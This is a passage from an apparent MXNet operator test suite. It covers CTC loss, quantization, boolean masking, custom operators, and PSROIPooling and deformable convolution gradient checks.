test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc._bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail check_numeric_gradient tol test
# due to finite difference method inaccuracies or function discontuities at the origin
def bad_input_finder(f, f_grad, dtype):
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/17467")
def test_custom_op_fork():
# test custom operator fork
# see https://github.com/apache/incubator-mxnet/issues/14396
class AdditionOP(mx.operator.CustomOp):
def __init__(self):
super(AdditionOP, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
out_data[0][:] = in_data[0] + in_data[1]
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
in_grad[0][:] = out_grad[0]
in_grad[1][:] = out_grad[0]
@mx.operator.register("AdditionOP")
class AdditionOPProp(mx.operator.CustomOpProp):
def __init__(self):
super(AdditionOPProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]]
def create_operator(self, ctx, shapes, dtypes):
return AdditionOP()
if not sys.platform.startswith('win'): # no fork in windows
def custom_add():
a = mx.nd.array([1, 2, 3])
b = mx.nd.array([4, 5, 6])
c = mx.nd.Custom(a, b, op_type='AdditionOP')
assert_almost_equal((a + b).asnumpy(), c.asnumpy())
custom_add()
from multiprocessing import Process
p = Process(target=custom_add)
p.daemon = True
p.start()
p.join(5)
assert not p.is_alive() and p.exitcode == 0
def _build_dot_custom(fun_forward, name):
class Dot(mx.operator.CustomOp):
def __init__(self):
super(Dot, self).__init__()
def forward(self, is_train, req, in_data, out_data, aux):
fun_forward(in_data, out_data)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register(name)
class DotProp(mx.operator.CustomOpProp):
def __init__(self):
super(DotProp, self).__init__()
def list_arguments(self):
return ['a', 'b']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [(in_shape[0][0], in_shape[1][1])]
def create_operator(self, ctx, shapes, dtypes):
return Dot()
def test_custom_op_exc():
# test except handling
# see https://github.com/apache/incubator-mxnet/pull/14693
# 1. error in python code
def custom_exc1():
def f(in_data, out_data):
assert False
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot1')
a = mx.nd.zeros((4, 1))
b = mx.nd.zeros((1, 4))
c = mx.nd.Custom(a, b, op_type='Dot1')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc1)
# 2. error in pushing operator to engine
def custom_exc2():
def f(in_data, out_data):
out_data[0][:] = mx.nd.dot(in_data[0], in_data[1])
_build_dot_custom(f, 'Dot2')
a = mx.nd.zeros((4, 2))
b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@pytest.mark.parametrize('num_batch', [1, 2])
@pytest.mark.parametrize('num_channel_data_deformable_group', itertools.product([4, 8], [1, 2]))
@pytest.mark.parametrize('input_height_width', itertools.product([5, 6], [5, 6]))
@pytest.mark.parametrize('dilate', [(1, 1), (2, 2)])
@pytest.mark.parametrize('grad_nodes', [['im_data'], ['offset_data'], ['weight']])
def test_deformable_convolution(num_batch, num_channel_data_deformable_group, input_height_width,
dilate, grad_nodes):
num_channel_data, num_deformable_group = num_channel_data_deformable_group
input_height, input_width = input_height_width
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data").as_np_ndarray()
offset_data_var = mx.symbol.Variable(name="offset_data").as_np_ndarray()
weight_var = mx.symbol.Variable(name="weight").as_np_ndarray()
bias_var = mx.symbol.Variable(name="bias").as_np_ndarray()
op = mx.sym.npx.deformable_convolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0), numeric_eps=1.0/64)
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@pytest.mark.skip(reason="Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
